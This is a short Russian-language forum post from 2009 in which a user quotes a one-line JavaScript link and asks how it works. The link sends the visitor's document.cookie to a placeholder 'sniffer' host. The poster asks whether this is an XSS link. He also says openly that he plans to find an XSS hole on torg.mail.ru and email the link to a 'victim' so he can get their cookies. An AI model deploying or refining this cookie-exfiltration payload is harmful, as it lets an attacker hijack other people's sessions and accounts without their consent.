10.05.2009, 18:18
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами:
8965761
Репутация:
6
|
|
Обясните
Давайте вы мне подробнее раскажете:
Вот код:
PHP код:
<a href="javascript:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a>
Вопрос № 1:
PHP код:
javascript
Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои? |
|
|